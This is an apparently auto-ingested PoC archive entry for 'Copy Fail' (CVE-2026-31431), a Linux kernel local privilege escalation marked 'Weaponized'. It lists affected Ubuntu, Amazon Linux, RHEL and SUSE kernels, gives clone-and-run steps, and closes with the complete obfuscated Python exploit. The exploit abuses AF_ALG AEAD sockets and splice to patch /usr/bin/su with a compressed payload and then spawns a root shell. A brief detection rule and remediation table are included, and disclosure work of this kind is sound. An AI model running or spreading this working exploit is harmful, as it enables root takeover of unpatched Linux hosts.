PoC Archive PoC Archive
High CVE-2026-31431 unpatched

Copy Fail Linux Kernel Local Privilege Escalation (CVE-2026-31431)

by Xint Code (Theori), Juno Im · 2026-05-17

Severity
High
CVE
CVE-2026-31431
Category
binary
Affected product
Linux kernel (crypto / AF_ALG AEAD path)
Affected versions
Confirmed on Ubuntu 24.04 (6.17.0-1007-aws), Amazon Linux 2023 (6.18.8-9.213.amzn2023), RHEL 10.1 (6.12.0-124.45.1.el10_1), SUSE 16 (6.12.0-160000.9-default)
Disclosed
2026-05-17
Patch status
unpatched

Metadata

FieldValue
Date Added2026-05-17
Last Updated2026-04-29
Author / ResearcherXint Code (Theori), Juno Im
CVE / AdvisoryCVE-2026-31431
Categorybinary
SeverityHigh
CVSS ScoreN/A
StatusWeaponized
TagsLPE, Linux kernel, AF_ALG, authenc, splice, local, Python
RelatedN/A

Affected Target

FieldValue
Software / SystemLinux kernel (crypto / AF_ALG AEAD path)
Versions AffectedConfirmed on Ubuntu 24.04 (6.17.0-1007-aws), Amazon Linux 2023 (6.18.8-9.213.amzn2023), RHEL 10.1 (6.12.0-124.45.1.el10_1), SUSE 16 (6.12.0-160000.9-default)
Language / PlatformPython, Linux
Authentication RequiredYes (local unprivileged shell)
Network Access RequiredLocal only

Summary

Copy Fail (CVE-2026-31431) is a Linux kernel local privilege-escalation vulnerability published by Theori (Xint Code). The provided PoC abuses AF_ALG AEAD socket operations with crafted parameters and splice() writes to patch privileged executable bytes and obtain root execution. Public exploit code is available and demonstrates practical exploitation against multiple major Linux distributions.


Vulnerability Details

Root Cause

The exploit indicates an unsafe kernel handling path in AEAD/authenc processing exposed through AF_ALG sockets. Crafted socket options and message metadata allow attacker-controlled writes during crypto processing, enabling corruption of privileged executable data from an unprivileged context.

Attack Vector

An attacker with local shell access runs the Python PoC. The script opens /usr/bin/su, creates an AF_ALG socket configured for authenc(hmac(sha256),cbc(aes)), repeatedly issues crafted sendmsg + splice operations, and then executes su to obtain elevated privileges.

Impact

Successful exploitation yields local privilege escalation to root on affected kernels. This allows full host compromise, including arbitrary command execution, persistence, and security control bypass.


Environment / Lab Setup

OS:           Ubuntu 24.04 LTS / Amazon Linux 2023 / RHEL 10.1 / SUSE 16
Target:       Linux kernel versions listed in Tested Distro / Version
Attacker:     Local unprivileged user on target host
Tools:        python3

Setup Steps

1
2
3
git clone https://github.com/theori-io/copy-fail-CVE-2026-31431
cd copy-fail-CVE-2026-31431
python3 copy_fail_exp.py

Proof of Concept

Step-by-Step Reproduction

  1. Prepare local lab host — Use a test kernel/distribution listed by upstream research.

    1
    
    uname -a
    
  2. Run exploit code as local user

    1
    
    python3 copy_fail_exp.py
    
  3. Confirm privilege escalation

    1
    2
    
    id
    whoami
    

Exploit Code

See copy_fail_exp.py in this folder.

1
2
#!/usr/bin/env python3
import os as g,zlib,socket as s

Expected Output

uid=0(root) gid=0(root) groups=0(root)
root

Screenshots / Evidence

  • No screenshots bundled in upstream repo.

Detection & Indicators of Compromise

SIEM / IDS Rule (example):

alert audit any any -> any any (msg:"Possible Copy Fail local exploit behavior"; content:"AF_ALG"; content:"splice"; sid:900031431;)

Remediation

ActionDetail
PatchApply vendor-provided kernel fixes for CVE-2026-31431 as distribution updates become available
WorkaroundRestrict untrusted local shell access and harden execution controls (AppArmor/SELinux/seccomp where applicable)
Config HardeningMonitor and limit abuse of AF_ALG and unusual local Python execution in production environments

References


Notes

Auto-ingested from https://github.com/theori-io/copy-fail-CVE-2026-31431 on 2026-05-17.

copy_fail_exp.py
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
#!/usr/bin/env python3
# DISCLAIMER: For authorized security research only.
import os as g,zlib,socket as s
def d(x):return bytes.fromhex(x)
def c(f,t,c):
 a=s.socket(38,5,0);a.bind(("aead","authencesn(hmac(sha256),cbc(aes))"));h=279;v=a.setsockopt;v(h,1,d('0800010000000010'+'0'*64));v(h,5,None,4);u,_=a.accept();o=t+4;i=d('00');u.sendmsg([b"A"*4+c],[(h,3,i*4),(h,2,b'\x10'+i*19),(h,4,b'\x08'+i*3),],32768);r,w=g.pipe();n=g.splice;n(f,w,o,offset_src=0);n(r,u.fileno(),o)
 try:u.recv(8+t)
 except:0
f=g.open("/usr/bin/su",0);i=0;e=zlib.decompress(d("78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3"))
while i<len(e):c(f,i,e[i:i+4]);i+=4
g.system("su")